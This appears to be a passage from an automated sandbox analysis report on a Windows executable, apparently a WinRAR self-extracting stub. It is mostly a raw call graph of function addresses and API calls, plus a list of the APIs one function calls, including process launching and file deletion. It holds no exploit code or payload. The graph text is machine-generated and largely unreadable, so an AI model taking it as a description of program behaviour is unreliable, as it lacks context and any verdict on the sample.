24822->24818 24824 8ace4a __EH_prolog 24823->24824 24825 8beb38 8 API calls 24824->24825 24826 8ace8d 24825->24826 24827 8beb38 8 API calls 24826->24827 24828 8aceb1 24827->24828 24828->24789 24830 8b4a80 __EH_prolog 24829->24830 24831 8beb38 8 API calls 24830->24831 24832 8b4a9c 24831->24832 24833 8a7b8b 24832->24833 24835 8b0e46 80 API calls 24832->24835 24833->24794 24835->24833 24837 8a828e __EH_prolog 24836->24837 24865 8a13dc 24837->24865 24839 8a82aa 24840 8a82bb 24839->24840 25008 8a9f42 24839->25008 24843 8a82f2 24840->24843 24873 8a1a04 24840->24873 25004 8a1692 24843->25004 24849 8a83e8 24900 8a1f6d 24849->24900 24852 8a83f3 24852->24843 24904 8a3b2d 24852->24904 24916 8a848e 24852->24916 24854 8aa56d 7 API calls 24855 8a82ee 24854->24855 24855->24843 24855->24854 24857 8a8389 24855->24857 25012 8ac0c5 CompareStringW _wcslen 24855->25012 24892 8a8430 24857->24892 24859 8aa582 24858->24859 24860 8aa5b0 24859->24860 25256 8aa69b 24859->25256 24860->24795 24862 8aa592 24862->24860 24863 8aa597 FindClose 24862->24863 24863->24860 24864->24800 24866 8a13e1 __EH_prolog 24865->24866 24867 8ace40 8 API calls 24866->24867 24868 8a1419 24867->24868 24869 8beb38 8 API calls 24868->24869 24872 8a1474 __cftof 24868->24872 24870 8a1461 24869->24870 24871 8ab505 84 API calls 24870->24871 24870->24872 24871->24872 24872->24839 24874 8a1a0e __EH_prolog 24873->24874 24886 8a1a61 24874->24886 24888 8a1b9b 24874->24888 25013 8a13ba 24874->25013 24876 8a1bc7 25016 8a138b 74 API calls 24876->25016 24879 8a3b2d 101 API calls 24882 8a1c12 24879->24882 24880 8a1bd4 24880->24879 24880->24888 24881 8a1c5a 24885 8a1c8d 24881->24885 24881->24888 25017 8a138b 74 API calls 24881->25017 24882->24881 24884 8a3b2d 101 API calls 24882->24884 24884->24882 24885->24888 24890 8a9e80 79 API calls 24885->24890 24886->24876 24886->24880 24886->24888 24887 8a3b2d 101 API calls 24889 8a1cde 24887->24889 24888->24855 24889->24887 24889->24888 24890->24889 24891 8a9e80 79 API calls 24891->24886 25035 8acf3d 24892->25035 24894 8a8440 25039 8b13d2 GetSystemTime SystemTimeToFileTime 24894->25039 24896 8a83a3 24896->24849 24897 8b1b66 24896->24897 25044 8bde6b 24897->25044 24901 8a1f72 __EH_prolog 24900->24901 24903 8a1fa6 24901->24903 25052 8a19af 24901->25052 24903->24852 24905 8a3b39 24904->24905 24906 8a3b3d 24904->24906 24905->24852 24915 8a9e80 79 API calls 24906->24915 24907 8a3b4f 24908 8a3b6a 24907->24908 24909 8a3b78 24907->24909 24910 8a3baa 24908->24910 25182 8a32f7 89 API calls 2 library calls 24908->25182 25183 8a286b 101 API calls 3 library calls 24909->25183 24910->24852 24913 8a3b76 24913->24910 25184 8a20d7 74 API calls 24913->25184 24915->24907 24917 8a8498 __EH_prolog 24916->24917 24920 8a84d5 24917->24920 24927 8a8513 24917->24927 25209 8b8c8d 103 API calls 24917->25209 24919 8a84f5 24921 8a84fa 24919->24921 24922 8a851c 24919->24922 24920->24919 24924 8a857a 24920->24924 24920->24927 24921->24927 25210 8a7a0d 152 API calls 24921->25210 24922->24927 25211 8b8c8d 103 API calls 24922->25211 24924->24927 25185 8a5d1a 24924->25185 24927->24852 24928 8a8605 24928->24927 25191 8a8167 24928->25191 24931 8a8797 24932 8aa56d 7 API calls 24931->24932 24934 8a8802 24931->24934 24932->24934 24933 8ad051 82 API calls 24941 8a885d 24933->24941 25197 8a7c0d 24934->25197 24936 8a898b 25214 8a2021 74 API calls 24936->25214 24937 8a8a5f 24942 8a8ab6 24937->24942 24954 8a8a6a 24937->24954 24938 8a8992 24938->24937 24943 8a89e1 24938->24943 24941->24927 24941->24933 24941->24936 24941->24938 25212 8a8117 84 API calls 24941->25212 25213 8a2021 74 API calls 24941->25213 24949 8a8a4c 24942->24949 25217 8a7fc0 97 API calls 24942->25217 24946 8aa231 3 API calls 24943->24946 24943->24949 24951 8a8b14 24943->24951 24944 8a8ab4 24945 8a959a 80 API calls 24944->24945 24945->24927 24950 8a8a19 24946->24950 24948 8a959a 80 API calls 24948->24927 24949->24944 24949->24951 24950->24949 25215 8a92a3 97 API calls 24950->25215 24963 8a8b82 24951->24963 24993 8a9105 24951->24993 25218 8a98bc 24951->25218 24952 8aab1a 8 API calls 24955 8a8bd1 24952->24955 24954->24944 25216 8a7db2 101 API calls 24954->25216 24958 8aab1a 8 API calls 24955->24958 24967 8a8be7 24958->24967 24961 8a8b70 25222 8a6e98 77 API calls 24961->25222 24963->24952 24964 8a8cbc 24965 8a8d18 24964->24965 24966 8a8e40 24964->24966 24968 8a8d8a 24965->24968 24969 8a8d28 24965->24969 24970 8a8e52 24966->24970 24971 8a8e66 24966->24971 24989 8a8d49 24966->24989 24967->24964 24976 8a8c93 24967->24976 24983 8a981a 79 API calls 24967->24983 24977 8a8167 19 API calls 24968->24977 24973 8a8d6e 24969->24973 24981 8a8d37 24969->24981 24974 8a9215 123 API calls 24970->24974 24972 8b3377 75 API calls 24971->24972 24975 8a8e7f 24972->24975 24973->24989 25225 8a77b8 111 API calls 24973->25225 24974->24989 25228 8b3020 123 API calls 24975->25228 24976->24964 25223 8a9a3c 82 API calls 24976->25223 24980 8a8dbd 24977->24980 24985 8a8de6 24980->24985 24986 8a8df5 24980->24986 24980->24989 25224 8a2021 74 API calls 24981->25224 24983->24976 25226 8a7542 85 API calls 24985->25226 25227 8a9155 93 API calls __EH_prolog 24986->25227 24992 8a8f85 24989->24992 25229 8a2021 74 API calls 24989->25229 24991 8a9090 24991->24993 24995 8aa4ed 3 API calls 24991->24995 24992->24991 24992->24993 24994 8a903e 24992->24994 25203 8a9f09 SetEndOfFile 24992->25203 24993->24948 25204 8a9da2 24994->25204 24996 8a90eb 24995->24996 24996->24993 25230 8a2021 74 API calls 24996->25230 24999 8a9085 25001 8a9620 77 API calls 24999->25001 25001->24991 25002 8a90fb 25231 8a6dcb 76 API calls 25002->25231 25005 8a16a4 25004->25005 25247 8acee1 25005->25247 25009 8a9f59 25008->25009 25010 8a9f63 25009->25010 25255 8a6d0c 78 API calls 25009->25255 25010->24840 25012->24855 25018 8a1732 25013->25018 25015 8a13d6 25015->24891 25016->24888 25017->24885 25019 8a1748 25018->25019 25030 8a17a0 __InternalCxxFrameHandler 25018->25030 25020 8a1771 25019->25020 25031 8a6c36 76 API calls __vswprintf_c_l 25019->25031 25022 8a17c7 25020->25022 25027 8a178d ___std_exception_copy 25020->25027 25024 8c3e3e 22 API calls 25022->25024 25023 8a1767 25032 8a6ca7 75 API calls 25023->25032 25026 8a17ce 25024->25026 25026->25030 25034 8a6ca7 75 API calls 25026->25034 25027->25030 25033 8a6ca7 75 API calls 25027->25033 25030->25015 25031->25023 25032->25020 25033->25030 25034->25030 25036 8acf4d 25035->25036 25038 8acf54 25035->25038 25040 8a981a 25036->25040 25038->24894 25039->24896 25041 8a9833 25040->25041 25043 8a9e80 79 API calls 25041->25043 25042 8a9865 25042->25038 25043->25042 25045 8bde78 25044->25045 25046 8ae617 53 API calls 25045->25046 25047 8bde9b 25046->25047 25048 8a4092 _swprintf 51 API calls 25047->25048 25049 8bdead 25048->25049 25050 8bd4d4 16 API calls 25049->25050 25051 8b1b7c 25050->25051 25051->24849 25053 8a19bf 25052->25053 25055 8a19bb 25052->25055 25056 8a18f6 25053->25056 25055->24903 25057 8a1908 25056->25057 25058 8a1945 25056->25058 25059 8a3b2d 101 API calls 25057->25059 25064 8a3fa3 25058->25064 25062 8a1928 25059->25062 25062->25055 25068 8a3fac 25064->25068 25065 8a3b2d 101 API calls 25065->25068 25066 8a1966 25066->25062 25069 8a1e50 25066->25069 25068->25065 25068->25066 25081 8b0e08 25068->25081 25070 8a1e5a __EH_prolog 25069->25070 25089 8a3bba 25070->25089 25072 8a1e84 25073 8a1732 78 API calls 25072->25073 25076 8a1f0b 25072->25076 25074 8a1e9b 25073->25074 25117 8a18a9 78 API calls 25074->25117 25076->25062 25077 8a1eb3 25079 8a1ebf _wcslen 25077->25079 25118 8b1b84 MultiByteToWideChar 25077->25118 25119 8a18a9 78 API calls 25079->25119 25082 8b0e0f 25081->25082 25083 8b0e2a 25082->25083 25087 8a6c31 RaiseException CallUnexpected 25082->25087 25085 8b0e3b SetThreadExecutionState 25083->25085 25088 8a6c31 RaiseException CallUnexpected 25083->25088 25085->25068 25087->25083 25088->25085 25090 8a3bc4 __EH_prolog 25089->25090 25091 8a3bda 25090->25091 25092 8a3bf6 25090->25092 25145 8a138b 74 API calls 25091->25145 25094 8a3e51 25092->25094 25097 8a3c22 25092->25097 25162 8a138b 74 API calls 25094->25162 25096 8a3be5 25096->25072 25097->25096 25120 8b3377 25097->25120 25099 8a3ca3 25101 8a3d2e 25099->25101 25116 8a3c9a 25099->25116 25148 8ad051 25099->25148 25100 8a3c9f 25100->25099 25147 8a20bd 78 API calls 25100->25147 25130 8aab1a 25101->25130 25103 8a3c8f 25146 8a138b 74 API calls 25103->25146 25104 8a3c71 25104->25099 25104->25100 25104->25103 25106 8a3d41 25110 8a3dd7 25106->25110 25111 8a3dc7 25106->25111 25154 8b3020 123 API calls 25110->25154 25134 8a9215 25111->25134 25114 8a3dd5 25114->25116 25155 8a2021 74 API calls 25114->25155 25156 8b2297 25116->25156 25117->25077 25118->25079 25119->25076 25121 8b338c 25120->25121 25123 8b3396 ___std_exception_copy 25120->25123 25163 8a6ca7 75 API calls 25121->25163 25124 8b34c6 25123->25124 25125 8b341c 25123->25125 25129 8b3440 __cftof 25123->25129 25165 8c238d RaiseException 25124->25165 25164 8b32aa 75 API calls 3 library calls 25125->25164 25128 8b34f2 25129->25104 25131 8aab28 25130->25131 25133 8aab32 25130->25133 25132 8beb38 8 API calls 25131->25132 25132->25133 25133->25106 25135 8a921f __EH_prolog 25134->25135 25166 8a7c64 25135->25166 25138 8a13ba 78 API calls 25139 8a9231 25138->25139 25169 8ad114 25139->25169 25141 8a9243 25142 8a928a 25141->25142 25144 8ad114 118 API calls 25141->25144 25178 8ad300 97 API calls __InternalCxxFrameHandler 25141->25178 25142->25114 25144->25141 25145->25096 25146->25116 25147->25099 25149 8ad072 25148->25149 25150 8ad084 25148->25150 25179 8a603a 82 API calls 25149->25179 25180 8a603a 82 API calls 25150->25180 25153 8ad07c 25153->25101 25154->25114 25155->25116 25157 8b22a1 25156->25157 25158 8b22ba 25157->25158 25161 8b22ce 25157->25161 25181 8b0eed 86 API calls 25158->25181 25160 8b22c1 25160->25161 25162->25096 25163->25123 25164->25129 25165->25128 25167 8ab146 GetVersionExW 25166->25167 25168 8a7c69 25167->25168 25168->25138 25175 8ad12a __InternalCxxFrameHandler 25169->25175 25170 8ad29a 25171 8ad0cb 6 API calls 25170->25171 25173 8ad2ce 25170->25173 25171->25173 25172 8b0e08 SetThreadExecutionState RaiseException 25176 8ad291 25172->25176 25173->25172 25174 8b8c8d 103 API calls 25174->25175 25175->25170 25175->25174 25175->25176 25177 8aac05 91 API calls 25175->25177 25176->25141 25177->25175 25178->25141 25179->25153 25180->25153 25181->25160 25182->24913 25183->24913 25184->24910 25186 8a5d2a 25185->25186 25232 8a5c4b 25186->25232 25189 8a5d5d 25190 8a5d95 25189->25190 25237 8ab1dc CharUpperW CompareStringW _wcslen ___vcrt_InitializeCriticalSectionEx 25189->25237 25190->24928 25192 8a8186 25191->25192 25193 8a8232 25192->25193 25244 8abe5e 19 API calls __InternalCxxFrameHandler 25192->25244 25243 8b1fac CharUpperW 25193->25243 25196 8a823b 25196->24931 25198 8a7c22 25197->25198 25199 8a7c5a 25198->25199 25245 8a6e7a 74 API calls 25198->25245 25199->24941 25201 8a7c52 25246 8a138b 74 API calls 25201->25246 25203->24994 25205 8a9db3 25204->25205 25208 8a9dc2 25204->25208 25206 8a9db9 FlushFileBuffers 25205->25206 25205->25208 25206->25208 25207 8a9e3f SetFileTime 25207->24999 25208->25207 25209->24920 25210->24927 25211->24927 25212->24941 25213->24941 25214->24938 25215->24949 25216->24944 25217->24949 25219 8a8b5a 25218->25219 25220 8a98c5 GetFileType 25218->25220 25219->24963 25221 8a2021 74 API calls 25219->25221 25220->25219 25221->24961 25222->24963 25223->24964 25224->24989 25225->24989 25226->24989 25227->24989 25228->24989 25229->24992 25230->25002 25231->24993 25238 8a5b48 25232->25238 25234 8a5c6c 25234->25189 25236 8a5b48 2 API calls 25236->25234 25237->25189 25239 8a5b52 25238->25239 25240 8a5c3a 25239->25240 25242 8ab1dc CharUpperW CompareStringW _wcslen ___vcrt_InitializeCriticalSectionEx 25239->25242 25240->25234 25240->25236 25242->25239 25243->25196 25244->25193 25245->25201 25246->25199 25249 8acef2 25247->25249 25253 8aa99e 86 API calls 25249->25253 25250 8acf24 25254 8aa99e 86 API calls 25250->25254 25252 8acf2f 25253->25250 25254->25252 25255->25010 25257 8aa6a8 25256->25257 25258 8aa6c1 FindFirstFileW 25257->25258 25259 8aa727 FindNextFileW 25257->25259 25261 8aa6d0 25258->25261 25266 8aa709 25258->25266 25260 8aa732 GetLastError 25259->25260 25259->25266 25260->25266 25262 8abb03 GetCurrentDirectoryW 25261->25262 25263 8aa6e0 25262->25263 25264 8aa6fe GetLastError 25263->25264 25265 8aa6e4 FindFirstFileW 25263->25265 25264->25266 25265->25264 25265->25266 25266->24862 25267->24699 25268->24702 25269->24702 25270->24705 25271->24713 25273 8a9f42 78 API calls 25272->25273 25274 8a1fe8 25273->25274 25275 8a1a04 101 API calls 25274->25275 25278 8a2005 25274->25278 25276 8a1ff5 25275->25276 25276->25278 25279 8a138b 74 API calls 25276->25279 25278->24721 25278->24722 25279->25278 25280 8a13e1 84 API calls 2 library calls 25352 8b94e0 GetClientRect 25387 8b21e0 26 API calls std::bad_exception::bad_exception 25409 8bf2e0 46 API calls __RTC_Initialize 25281 8beae7 25282 8beaf1 25281->25282 25283 8be85d ___delayLoadHelper2@8 14 API calls 25282->25283 25284 8beafe 25283->25284 25353 8bf4e7 29 API calls _abort 25410 8cbee0 GetCommandLineA GetCommandLineW 25354 8c2cfb 38 API calls 4 library calls 25388 8a95f0 80 API calls 25389 8bfd4f 9 API calls 2 library calls 25411 8a5ef0 82 API calls 25301 8c98f0 25309 8cadaf 25301->25309 25304 8c9904 25306 8c990c 25307 8c9919 25306->25307 25317 8c9920 11 API calls 25306->25317 25310 8cac98 _abort 5 API calls 25309->25310 25311 8cadd6 25310->25311 25312 8cadee TlsAlloc 25311->25312 25313 8caddf 25311->25313 25312->25313 25314 8bfbbc _ValidateLocalCookies 5 API calls 25313->25314 25315 8c98fa 25314->25315 25315->25304 25316 8c9869 20 API calls 2 library calls 25315->25316 25316->25306 25317->25304 25318 8cabf0 25319 8cabfb 25318->25319 25321 8cac24 25319->25321 25323 8cac20 25319->25323 25324 8caf0a 25319->25324 25331 8cac50 DeleteCriticalSection 25321->25331 25325 8cac98 _abort 5 API calls 25324->25325 25326 8caf31 25325->25326 25327 8caf4f InitializeCriticalSectionAndSpinCount 25326->25327 25330 8caf3a 25326->25330 25327->25330 25328 8bfbbc _ValidateLocalCookies 5 API calls 25329 8caf66 25328->25329 25329->25319 25330->25328 25331->25323 25355 8c88f0 7 API calls ___scrt_uninitialize_crt 25357 8ba400 GdipDisposeImage GdipFree 25412 8bd600 70 API calls 25358 8c6000 QueryPerformanceFrequency QueryPerformanceCounter 25392 8c2900 6 API calls 4 library calls 25413 8cf200 51 API calls 25430 8ca700 21 API calls 25432 8a1710 86 API calls 25395 8bad10 73 API calls 25414 8bc220 93 API calls _swprintf 25364 8cf421 21 API calls __vswprintf_c_l 25397 8cb4ae 27 API calls _ValidateLocalCookies 25365 8a1025 29 API calls 25398 8bf530 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 25435 8bff30 LocalFree 25367 8cc030 GetProcessHeap 25368 8ba440 GdipCloneImage GdipAlloc 25415 8c3a40 5 API calls _ValidateLocalCookies 25437 8d1f40 CloseHandle 24164 8bcd58 24166 8bce22 24164->24166 24171 8bcd7b 24164->24171 24177 8bc793 _wcslen _wcsrchr 24166->24177 24192 8bd78f 24166->24192 24168 8bd40a 24170 8b1fbb CompareStringW 24170->24171 24171->24166 24171->24170 24172 8bca67 SetWindowTextW 24172->24177 24177->24168 24177->24172 24178 8bc855 SetFileAttributesW 24177->24178 24184 8bcc31 GetDlgItem SetWindowTextW SendMessageW 24177->24184 24187 8bcc71 SendMessageW 24177->24187 24191 8b1fbb CompareStringW 24177->24191 24216 8bb314 24177->24216 24220 8ba64d GetCurrentDirectoryW 24177->24220 24222 8aa5d1 6 API calls 24177->24222 24223 8aa55a FindClose 24177->24223 24224 8bb48e 76 API calls 2 library calls 24177->24224 24225 8c3e3e 24177->24225 24180 8bc90f GetFileAttributesW 24178->24180 24181 8bc86f __cftof _wcslen 24178->24181 24180->24177 24183 8bc921 DeleteFileW 24180->24183 24181->24177 24181->24180 24221 8ab991 51 API calls 2 library calls 24181->24221 24183->24177 24185 8bc932 24183->24185 24184->24177 24186 8a4092 _swprintf 51 API calls 24185->24186 24188 8bc952 GetFileAttributesW 24186->24188 24187->24177 24188->24185 24189 8bc967 MoveFileW 24188->24189 24189->24177 24190 8bc97f MoveFileExW 24189->24190 24190->24177 24191->24177 24194 8bd799 __cftof _wcslen 24192->24194 24193 8bd9e7 24193->24177 24194->24193 24195 8bd8a5 24194->24195 24196 8bd9c0 24194->24196 24241 8b1fbb CompareStringW 24194->24241 24238 8aa231 24195->24238 24196->24193 24200 8bd9de ShowWindow 24196->24200 24200->24193 24201 8bd8d9 ShellExecuteExW 24201->24193 24206 8bd8ec 24201->24206 24203 8bd8d1 24203->24201 24204 8bd925 24243 8bdc3b 6 API calls 24204->24243 24205 8bd97b CloseHandle 24207 8bd989 24205->24207 24208 8bd994 24205->24208 24206->24204 24206->24205 24209 8bd91b ShowWindow 24206->24209 24244 8b1fbb CompareStringW 24207->24244 24208->24196 24209->24204 24212 8bd93d 24212->24205 24213 8bd950 GetExitCodeProcess 24212->24213 24213->24205 24214 8bd963 24213->24214 24214->24205 24217 8bb31e 24216->24217 24218 8bb3f0 ExpandEnvironmentStringsW 24217->24218 24219 8bb40d 24217->24219 24218->24219 24219->24177 24220->24177 24221->24181 24222->24177 24223->24177 24224->24177 24226 8c8e54 24225->24226 24227 8c8e6c 24226->24227 24228 8c8e61 24226->24228 24229 8c8e74 24227->24229 24236 8c8e7d _abort 24227->24236 24253 8c8e06 24228->24253 24231 8c8dcc _free 20 API calls 24229->24231 24234 8c8e69 24231->24234 24232 8c8ea7 HeapReAlloc 24232->24234 24232->24236 24233 8c8e82 24260 8c91a8 20 API calls __dosmaperr 24233->24260 24234->24177 24236->24232 24236->24233 24261 8c7a5e 7 API calls 2 library calls 24236->24261 24245 8aa243 24238->24245 24241->24195 24242 8ab6c4 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW 24242->24203 24243->24212 24244->24208 24246 8bec50 24245->24246 24247 8aa250 GetFileAttributesW 24246->24247 24248 8aa23a 24247->24248 24249 8aa261 24247->24249 24248->24201 24248->24242 24250 8abb03 GetCurrentDirectoryW 24249->24250 24251 8aa275 24250->24251 24251->24248 24252 8aa279 GetFileAttributesW 24251->24252 24252->24248 24254 8c8e44 24253->24254 24258 8c8e14 _abort 24253->24258 24263 8c91a8 20 API calls __dosmaperr 24254->24263 24256 8c8e2f RtlAllocateHeap 24257 8c8e42 24256->24257 24256->24258 24257->24234 24258->24254 24258->24256 24262 8c7a5e 7 API calls 2 library calls 24258->24262 24260->24234 24261->24236 24262->24258 24263->24257 25371 8be455 14 API calls ___delayLoadHelper2@8 25372 8bc793 107 API calls 4 library calls 25438 8c7f6e 52 API calls 3 library calls 24304 8c8268 24315 8cbb30 24304->24315 24310 8c8dcc _free 20 API calls 24311 8c82ba 24310->24311 24312 8c8290 24313 8c8dcc _free 20 API calls 24312->24313 24314 8c8285 24313->24314 24314->24310 24316 8cbb39 24315->24316 24317 8c827a 24315->24317 24332 8cba27 24316->24332 24319 8cbf30 GetEnvironmentStringsW 24317->24319 24320 8cbf47 24319->24320 24330 8cbf9a 24319->24330 24323 8cbf4d WideCharToMultiByte 24320->24323 24321 8c827f 24321->24314 24331 8c82c0 26 API calls 4 library calls 24321->24331 24322 8cbfa3 FreeEnvironmentStringsW 24322->24321 24324 8cbf69 24323->24324 24323->24330 24325 8c8e06 __vswprintf_c_l 21 API calls 24324->24325 24326 8cbf6f 24325->24326 24327 8cbf76 WideCharToMultiByte 24326->24327 24328 8cbf8c 24326->24328 24327->24328 24329 8c8dcc _free 20 API calls 24328->24329 24329->24330 24330->24321 24330->24322 24331->24312 24333 8c97e5 _abort 38 API calls 24332->24333 24334 8cba34 24333->24334 24352 8cbb4e 24334->24352 24336 8cba3c 24361 8cb7bb 24336->24361 24339 8cba53 24339->24317 24340 8c8e06 __vswprintf_c_l 21 API calls 24341 8cba64 24340->24341 24347 8cba96 24341->24347 24368 8cbbf0 24341->24368 24344 8c8dcc _free 20 API calls 24344->24339 24345 8cba91 24378 8c91a8 20 API calls __dosmaperr 24345->24378 24347->24344 24348 8cbaae 24349 8cbada 24348->24349 24350 8c8dcc _free 20 API calls 24348->24350 24349->24347 24379 8cb691 26 API calls 24349->24379 24350->24349 24353 8cbb5a __FrameHandler3::FrameUnwindToState 24352->24353 24354 8c97e5 _abort 38 API calls 24353->24354 24359 8cbb64 24354->24359 24356 8cbbe8 _abort 24356->24336 24359->24356 24360 8c8dcc _free 20 API calls 24359->24360 24380 8c8d24 38 API calls _abort 24359->24380 24381 8cac31 EnterCriticalSection 24359->24381 24382 8cbbdf LeaveCriticalSection _abort 24359->24382 24360->24359 24362 8c4636 __cftof 38 API calls 24361->24362 24363 8cb7cd 24362->24363 24364 8cb7dc GetOEMCP 24363->24364 24365 8cb7ee 24363->24365 24367 8cb805 24364->24367 24366 8cb7f3 GetACP 24365->24366 24365->24367 24366->24367 24367->24339 24367->24340 24369 8cb7bb 40 API calls 24368->24369 24370 8cbc0f 24369->24370 24372 8cbc60 IsValidCodePage 24370->24372 24375 8cbc16 24370->24375 24377 8cbc85 __cftof 24370->24377 24371 8bfbbc _ValidateLocalCookies 5 API calls 24373 8cba89 24371->24373 24374 8cbc72 GetCPInfo 24372->24374 24372->24375 24373->24345 24373->24348 24374->24375 24374->24377 24375->24371 24383 8cb893 GetCPInfo 24377->24383 24378->24347 24379->24347 24381->24359 24382->24359 24387 8cb8cd 24383->24387 24392 8cb977 24383->24392 24386 8bfbbc _ValidateLocalCookies 5 API calls 24389 8cba23 24386->24389 24393 8cc988 24387->24393 24389->24375 24391 8cab78 __vswprintf_c_l 43 API calls 24391->24392 24392->24386 24394 8c4636 __cftof 38 API calls 24393->24394 24395 8cc9a8 MultiByteToWideChar 24394->24395 24397 8cc9e6 24395->24397 24404 8cca7e 24395->24404 24399 8c8e06 __vswprintf_c_l 21 API calls 24397->24399 24405 8cca07 __cftof __vsnwprintf_l 24397->24405 24398 8bfbbc _ValidateLocalCookies 5 API calls 24400 8cb92e 24398->24400 24399->24405 24407 8cab78 24400->24407 24401 8cca78 24412 8cabc3 20 API calls _free 24401->24412 24403 8cca4c MultiByteToWideChar 24403->24401 24406 8cca68 GetStringTypeW 24403->24406 24404->24398 24405->24401 24405->24403 24406->24401 24408 8c4636 __cftof 38 API calls 24407->24408 24409 8cab8b 24408->24409 24413 8ca95b 24409->24413 24412->24404 24414 8ca976 __vswprintf_c_l 24413->24414 24415 8ca99c MultiByteToWideChar 24414->24415 24416 8ca9c6 24415->24416 24427 8cab50 24415->24427 24421 8c8e06 __vswprintf_c_l 21 API calls 24416->24421 24423 8ca9e7 __vsnwprintf_l 24416->24423 24417 8bfbbc _ValidateLocalCookies 5 API calls 24418 8cab63 24417->24418 24418->24391 24419 8caa9c 24449 8cabc3 20 API calls _free 24419->24449 24420 8caa30 MultiByteToWideChar 24420->24419 24422 8caa49 24420->24422 24421->24423 24440 8caf6c 24422->24440 24423->24419 24423->24420 24427->24417 24428 8caaab 24430 8c8e06 __vswprintf_c_l 21 API calls 24428->24430 24434 8caacc __vsnwprintf_l 24428->24434 24429 8caa73 24429->24419 24431 8caf6c __vswprintf_c_l 11 API calls 24429->24431 24430->24434 24431->24419 24432 8cab41 24448 8cabc3 20 API calls _free 24432->24448 24434->24432 24435 8caf6c __vswprintf_c_l 11 API calls 24434->24435 24436 8cab20 24435->24436 24436->24432 24437 8cab2f WideCharToMultiByte 24436->24437 24437->24432 24438 8cab6f 24437->24438 24450 8cabc3 20 API calls _free 24438->24450 24441 8cac98 _abort 5 API calls 24440->24441 24442 8caf93 24441->24442 24445 8caf9c 24442->24445 24451 8caff4 10 API calls 3 library calls 24442->24451 24444 8cafdc LCMapStringW 24444->24445 24446 8bfbbc _ValidateLocalCookies 5 API calls 24445->24446 24447 8caa60 24446->24447 24447->24419 24447->24428 24447->24429 24448->24419 24449->24427 24450->24419 24451->24444 25286 8a9f7a 25287 8a9f88 25286->25287 25288 8a9f8f 25286->25288 25289 8a9f9c GetStdHandle 25288->25289 25296 8a9fab 25288->25296 25289->25296 25290 8aa003 WriteFile 25290->25296 25291 8a9fcf 25292 8a9fd4 WriteFile 25291->25292 25291->25296 25292->25291 25292->25296 25294 8aa095 25298 8a6e98 77 API calls 25294->25298 25296->25287 25296->25290 25296->25291 25296->25292 25296->25294 25297 8a6baa 78 API calls 25296->25297 25297->25296 25298->25287 25439 8a1f72 128 API calls __EH_prolog 25374 8ba070 10 API calls 25417 8bb270 99 API calls 25333 8a9a74 25337 8a9a7e 25333->25337 25334 8a9ab1 25335 8a9b9d SetFilePointer 25335->25334 25336 8a9bb6 GetLastError 25335->25336 25336->25334 25337->25334 25337->25335 25338 8a981a 79 API calls 25337->25338 25339 8a9b79 25337->25339 25338->25339 25339->25335 25376 8a1075 84 API calls

                                                                                                                                  Executed Functions

                                                                                                                                  Function 008BDF1E Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 195filesleeptimeCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 008B0863: GetModuleHandleW.KERNEL32(kernel32), ref: 008B087C
                                                                                                                                    • Part of subcall function 008B0863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 008B088E
                                                                                                                                    • Part of subcall function 008B0863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 008B08BF
                                                                                                                                    • Part of subcall function 008BA64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 008BA655
                                                                                                                                    • Part of subcall function 008BAC16: OleInitialize.OLE32(00000000), ref: 008BAC2F
                                                                                                                                    • Part of subcall function 008BAC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 008BAC66
                                                                                                                                    • Part of subcall function 008BAC16: SHGetMalloc.SHELL32(008E8438), ref: 008BAC70
                                                                                                                                  • GetCommandLineW.KERNEL32 ref: 008BDF5C
                                                                                                                                  • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 008BDF83
                                                                                                                                  • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 008BDF94
                                                                                                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 008BDFCE
                                                                                                                                    • Part of subcall function 008BDBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 008BDBF4
                                                                                                                                    • Part of subcall function 008BDBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 008BDC30
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 008BDFD7
                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,008FEC90,00000800), ref: 008BDFF2
                                                                                                                                  • SetEnvironmentVariableW.KERNEL32(sfxname,008FEC90), ref: 008BDFFE
                                                                                                                                  • GetLocalTime.KERNEL32(?), ref: 008BE009
                                                                                                                                  • _swprintf.LIBCMT ref: 008BE048
                                                                                                                                  • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 008BE05A
                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 008BE061
                                                                                                                                  • LoadIconW.USER32(00000000,00000064), ref: 008BE078
                                                                                                                                  • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 008BE0C9
                                                                                                                                  • Sleep.KERNEL32(?), ref: 008BE0F7
                                                                                                                                  • DeleteObject.GDI32 ref: 008BE130
                                                                                                                                  • DeleteObject.GDI32(?), ref: 008BE140
                                                                                                                                  • CloseHandle.KERNEL32 ref: 008BE183
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
